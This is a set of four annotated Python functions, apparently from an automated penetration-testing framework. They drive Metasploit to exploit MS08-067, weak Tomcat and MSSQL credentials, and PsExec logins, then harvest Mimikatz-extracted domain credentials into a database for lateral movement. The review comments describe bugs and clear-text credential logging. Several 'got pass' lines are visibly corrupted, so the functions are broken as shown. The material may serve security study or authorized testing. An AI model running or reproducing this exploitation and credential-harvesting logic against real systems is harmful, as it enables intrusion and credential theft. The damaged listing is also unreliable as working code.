Exemple #1
def collectCredentials(footprint_id):
    """Try one stored credential set against one host and record the result.

    Opens a MySQL connection using the settings in ``connections.conf``,
    waits until ``dbfunctions.getMsfPass`` returns something other than an
    empty string for *footprint_id*, then asks
    ``dbfunctions.getHostToLogInTo`` for a single row. If a row is returned,
    it is handed to ``metasploitfunctions.loginWithPsExec``; the returned log
    lines decide whether the attempt is stored as failed or successful, and
    on success any credentials parsed out of the log are stored as well.

    NOTE(review): the listing is damaged on the "got pass" line (see the
    comment there), so the code that creates ``client`` and ``res`` is not
    visible and the function is not valid Python as shown.

    NOTE(review): credential material is written to the log in clear text in
    two places below. Anyone who can read the log can read those secrets;
    log an identifier instead and restrict access to the log files.
    """
    logVal("cred",  "started")
    # connections.conf is resolved relative to the current working directory
    # and holds the database password in plain text.
    conf = ConfigParser.ConfigParser()
    conf.read("connections.conf")
    
    db = MySQLdb.connect(host="localhost", user=conf.get('MySQL',  'user'), passwd=conf.get('MySQL',  'pass'), db=conf.get('MySQL',  'db'))
    db.autocommit(True)
    
    # Poll once per second until a non-empty value comes back. There is no
    # timeout, so this blocks forever if the value is never stored.
    msfpass = ""
    while msfpass == "":
        time.sleep(1)
        msfpass = dbfunctions.getMsfPass(db,  footprint_id)
    
    # `connected` is assigned here and never read in the visible code.
    connected = False
    client = None
    console_id = None
    
    # NOTE(review): the next line is corrupted in this listing. The text
    # between the "got pass" log call and the "got res" log call was masked
    # with asterisks, taking with it whatever assigned `client` and `res`.
    # The original apparently logged the value of `msfpass` here, which would
    # put that password in the log; confirm against the real file.
    logVal("cred",  "got pass: "******"cred",  "got res: " + str(res))
    console_id = res['id']
    
    # The `if True:` lines stand in for the commented-out `while True:` and
    # `try:`, so the body below runs exactly once with no exception handling.
    #while True:
    if True:
        if True:
            host_data = dbfunctions.getHostToLogInTo(db,  footprint_id)
            if host_data == None:
                # Despite the message nothing is re-checked here: after the
                # sleep, control falls through to the console cleanup.
                logVal("cred",  "no hosts to log in to. will check again in 5 seconds")
                time.sleep(5)
            else:
                #try:
                if True:
                    # host_data[1] is used as the target host; host_data[3..5]
                    # are passed on as the credential fields (presumably
                    # domain, user and password; confirm against dbfunctions).
                    # NOTE(review): this log call writes those fields in clear
                    # text.
                    logVal("cred",  "log in to host {0} with creds {1}\{2} : {3}".format(host_data[1],  host_data[3],  host_data[4],  host_data[5]))
                    # Interface name is hard-coded; this lookup raises if the
                    # machine has no 'eth0' or it has no IPv4 address.
                    lhost = netifaces.ifaddresses('eth0')[netifaces.AF_INET][0]['addr']
                    msflog = metasploitfunctions.loginWithPsExec(client,  console_id, lhost,  host_data[1],  msfpass,  host_data[3],  host_data[4],  host_data[5])
                    # Logged before the output has been checked, so "logged
                    # into" is printed even when the logon failed.
                    logVal("cred",  "logged into {0}. looking for creds".format(host_data[1]))
                    
                    # Success is assumed unless a log line contains the
                    # failure marker. There is no `break`, so every matching
                    # line stores another failed-attempt record.
                    loginSuccess = True
                    for l in msflog:
                        if l.find("STATUS_LOGON_FAILURE") > -1:
                            loginSuccess = False
                            logVal("cred",  "creds did not work on {0}".format(host_data[1]))
                            dbfunctions.addLoginAttemptResult(db,  host_data[0],  host_data[2],  False)
                            
                            
                    if loginSuccess:
                        logVal("cred",  "creds worked on {0}".format(host_data[1]))
                        dbfunctions.addLoginAttemptResult(db,  host_data[0],  host_data[2],  True)
                        creds = metasploitfunctions.extractMimikatzCreds(msflog)
                    
                        for cred in creds:
                            dbfunctions.addDomainCreds(db,  footprint_id,  cred[1],  cred[0],  cred[2],  "", "", "")
                            # NOTE(review): all three parsed fields go to the
                            # log in clear text.
                            logVal("cred",  "adding creds {0} :: {1} :: {2}".format(cred[1],  cred[0],  cred[2]))
                #except:
                    #logVal("cred",  "an error occurred")
            # Runs whether or not a host was found. It is not reached if
            # anything above raises, because the try/except is commented out.
            # The return value is stored and never used.
            cleanup = client.call('console.destroy',[console_id])
Exemple #2
def vulnExploiter(footprint_id,  options):
    """Run every enabled stage in turn, once per second, without end.

    Opens a MySQL connection from the settings in ``connections.conf`` and
    waits until ``dbfunctions.getMsfPass`` returns something other than an
    empty string for *footprint_id*. The value is only used as that start
    gate; nothing else in this function reads it.

    Each pass checks the four flags on *options* in a fixed order. For an
    enabled flag the matching ``dbfunctions`` lookup is called, and if it
    returns a row the stage function is run in a child process that is
    joined immediately, so stages never overlap. The function never returns.

    NOTE(review): the "no hosts" messages say "5 seconds", but the only
    delay in the loop is the one-second sleep at the end of each pass.
    NOTE(review): ``expoitWeakMsSqlCreds`` is spelled as in the original; it
    has to match whatever defines the options object.
    """
    settings = ConfigParser.ConfigParser()
    settings.read("connections.conf")

    db = MySQLdb.connect(
        host="localhost",
        user=settings.get('MySQL', 'user'),
        passwd=settings.get('MySQL', 'pass'),
        db=settings.get('MySQL', 'db'),
    )
    db.autocommit(True)

    # Start gate: poll once per second until a non-empty value is stored.
    while True:
        time.sleep(1)
        msfpass = dbfunctions.getMsfPass(db, footprint_id)
        if msfpass != "":
            break

    def run_stage(stage):
        # Start the stage in its own process and block until it exits.
        worker = multiprocessing.Process(target=stage, args=(footprint_id, ))
        worker.start()
        worker.join()

    while True:
        if options.exploitMs08067:
            pending = dbfunctions.getHostVulnerableToMS08067(db, footprint_id)
            if pending == None:
                logVal("ms08", "no vulnerable hosts. will check again in 5 seconds")
            else:
                print "exploiting ms08"
                run_stage(exploitMS08067)

        if options.expoitWeakMsSqlCreds:
            pending = dbfunctions.getHostVulnerableWeakSqlCreds(db, footprint_id)
            if pending == None:
                logVal("sql", "no vulnerable hosts. will check again in 5 seconds")
            else:
                print "exploiting sql"
                run_stage(exploitWeakSqlCreds)

        if options.exploitWeakTomcatCreds:
            pending = dbfunctions.getHostVulnerableWeakTomcatCreds(db, footprint_id)
            if pending == None:
                logVal("tomcat", "no vulnerable hosts. will check again in 5 seconds")
            else:
                print "exploiting tomcat"
                run_stage(exploitWeakTomcatCreds)

        if options.credPivot:
            pending = dbfunctions.getHostToLogInTo(db, footprint_id)
            if pending == None:
                logVal("cred", "no hosts to log in to. will check again in 5 seconds")
            else:
                print "logging in with known creds"
                run_stage(collectCredentials)

        time.sleep(1)
Exemple #3
def exploitMS08067(footprint_id):    
    """Process one host returned by the MS08-067 lookup and store the results.

    Opens a MySQL connection from ``connections.conf``, waits for a non-empty
    value from ``dbfunctions.getMsfPass``, then asks
    ``dbfunctions.getHostVulnerableToMS08067`` for a single row. If a row is
    returned it is passed to ``metasploitfunctions.exploitMS08067``; any
    credentials parsed from the returned log are stored, and the host is
    marked through ``dbfunctions.setHostExploitedDate``.

    NOTE(review): the listing is damaged on the "got pass" line (see the
    comment there), so the code that creates ``client`` and ``res`` is not
    visible and the function is not valid Python as shown.

    NOTE(review): no console cleanup call appears in this function as
    listed, whereas ``collectCredentials`` calls ``console.destroy``.
    """
    logVal("ms08",  "started")
    # connections.conf is resolved relative to the current working directory
    # and holds the database password in plain text.
    conf = ConfigParser.ConfigParser()
    conf.read("connections.conf")
    
    db = MySQLdb.connect(host="localhost", user=conf.get('MySQL',  'user'), passwd=conf.get('MySQL',  'pass'), db=conf.get('MySQL',  'db'))
    db.autocommit(True)
    
    # Poll every two seconds until a non-empty value comes back; no timeout.
    msfpass = ""
    while msfpass == "":
        time.sleep(2)
        msfpass = dbfunctions.getMsfPass(db,  footprint_id)
    
    # `connected` is assigned here and never read in the visible code.
    connected = False
    client = None
    console_id = None
    
    # NOTE(review): the next line is corrupted in this listing. The text
    # between the two log calls was masked with asterisks, taking with it
    # whatever assigned `client` and `res`. The original apparently logged
    # the value of `msfpass`; confirm against the real file.
    logVal("ms08",  "got pass: "******"ms08",  "got res: " + str(res))
    console_id = res['id']
        
    logVal("ms08",  "connected")
    
    # The `if True:` lines stand in for the commented-out outer `try:` and
    # `while True:`, so the body below runs exactly once.
    if True:
        #try:
        if True:
        #while True:
            host_data = dbfunctions.getHostVulnerableToMS08067(db,  footprint_id)
            if host_data == None:
                # Despite the message nothing is re-checked: the function
                # returns after this sleep.
                logVal("ms08",  "no vulnerable hosts. will check again in 5 seconds")
                time.sleep(5)
            else:
                try:
                    # host_data[0] is used as the target host, host_data[1]
                    # as the key passed to setHostExploitedDate.
                    logVal("ms08",  "exploiting host {0}".format(host_data[0]))
                    # Interface name is hard-coded; this lookup raises if the
                    # machine has no 'eth0' or it has no IPv4 address.
                    lhost = netifaces.ifaddresses('eth0')[netifaces.AF_INET][0]['addr']
                    msflog = metasploitfunctions.exploitMS08067(client,  console_id, lhost,  host_data[0],  msfpass)
                    creds = metasploitfunctions.extractMimikatzCreds(msflog)
                
                    for cred in creds:
                        dbfunctions.addDomainCreds(db,  footprint_id,  cred[1],  cred[0],  cred[2],  "", "", "")
                        # NOTE(review): all three parsed fields go to the log
                        # in clear text.
                        logVal("ms08",  "adding creds {0} :: {1} :: {2}".format(cred[1],  cred[0],  cred[2]))
                        
                    # Only reached when nothing above raised.
                    dbfunctions.setHostExploitedDate(db,  host_data[1])
                # NOTE(review): a bare `except:` also catches SystemExit and
                # KeyboardInterrupt, and the exception itself is discarded.
                # The message is logged under the "sql" tag although this is
                # the ms08 stage, which looks like a copy-paste slip.
                except:
                    logVal("sql",  "error exploiting host {0}".format(host_data[0]))
                    time.sleep(1)
Exemple #4
def exploitWeakTomcatCreds(footprint_id):
    """Process one host returned by the weak-Tomcat-credentials lookup.

    Opens a MySQL connection from ``connections.conf``, waits for a non-empty
    value from ``dbfunctions.getMsfPass``, then asks
    ``dbfunctions.getHostVulnerableWeakTomcatCreds`` for a single row. If a
    row is returned it is passed to
    ``metasploitfunctions.exploitWeakTomcatCreds``; credentials parsed from
    the returned log are stored and the host is marked through
    ``dbfunctions.setHostExploitedDate``.

    NOTE(review): the listing is damaged on the "got pass" line (see the
    comment there), so the code that creates ``sqlclient`` and ``sqlres`` is
    not visible and the function is not valid Python as shown.

    NOTE(review): in the lines visible here there is no exception handling
    and no console cleanup call.
    """
    logVal("tomcat",  "started")
    # connections.conf is resolved relative to the current working directory
    # and holds the database password in plain text.
    conf = ConfigParser.ConfigParser()
    conf.read("connections.conf")
    
    db = MySQLdb.connect(host="localhost", user=conf.get('MySQL',  'user'), passwd=conf.get('MySQL',  'pass'), db=conf.get('MySQL',  'db'))
    db.autocommit(True)
    
    # Poll once per second until a non-empty value comes back; no timeout.
    msfpass = ""
    while msfpass == "":
        time.sleep(1)
        msfpass = dbfunctions.getMsfPass(db,  footprint_id)
    
    # `connected` is assigned here and never read in the visible code. The
    # `sql` prefix on the next two names looks carried over from the SQL
    # stage; they hold this stage's client and console id.
    connected = False
    sqlclient = None
    sqlconsole_id = None
    
    # NOTE(review): the next line is corrupted in this listing. The text
    # between the two log calls was masked with asterisks, taking with it
    # whatever assigned `sqlclient` and `sqlres`. The original apparently
    # logged the value of `msfpass`; confirm against the real file.
    logVal("tomcat",  "got pass: "******"tomcat",  "got res: " + str(sqlres))
    sqlconsole_id = sqlres['id']

    # The `if True:` lines stand in for the commented-out `while True:` and
    # `try:`, so the body below runs exactly once with no exception handling.
    if True:
        if True:
#        while True:
            host_data = dbfunctions.getHostVulnerableWeakTomcatCreds(db,  footprint_id)
            if host_data == None:
                # Despite the message nothing is re-checked after this sleep.
                logVal("tomcat",  "no vulnerable hosts. will check again in 5 seconds")
                time.sleep(5)
            else:
                #try:
                if True:
                    logVal("tomcat",  "exploiting host {0}".format(host_data[0]))
                    # Interface name is hard-coded; this lookup raises if the
                    # machine has no 'eth0' or it has no IPv4 address.
                    lhost = netifaces.ifaddresses('eth0')[netifaces.AF_INET][0]['addr']
                    # host_data[3] is split on ":" into two fields (presumably
                    # user and password; confirm against dbfunctions), with
                    # the "<empty>" placeholder mapped to an empty string.
                    # A value with no ":" raises IndexError, and anything
                    # after a second ":" is dropped.
                    msflog = metasploitfunctions.exploitWeakTomcatCreds(sqlclient,  sqlconsole_id, lhost,  host_data[0],  msfpass,  host_data[3].split(":")[0],  host_data[3].split(":")[1].replace("<empty>",  ""))
                    logVal("tomcat",  "done exploiting {0}. extracting creds".format(host_data[0]))
                    creds = metasploitfunctions.extractMimikatzCreds(msflog)
                    
                    for cred in creds:
                        dbfunctions.addDomainCreds(db,  footprint_id,  cred[1],  cred[0],  cred[2],  "", "", "")
                        # NOTE(review): all three parsed fields go to the log
                        # in clear text.
                        logVal("tomcat",  "adding creds {0} :: {1} :: {2}".format(cred[1],  cred[0],  cred[2]))
                    
                    # host_data[1] is the key passed to mark the host done.
                    dbfunctions.setHostExploitedDate(db,  host_data[1])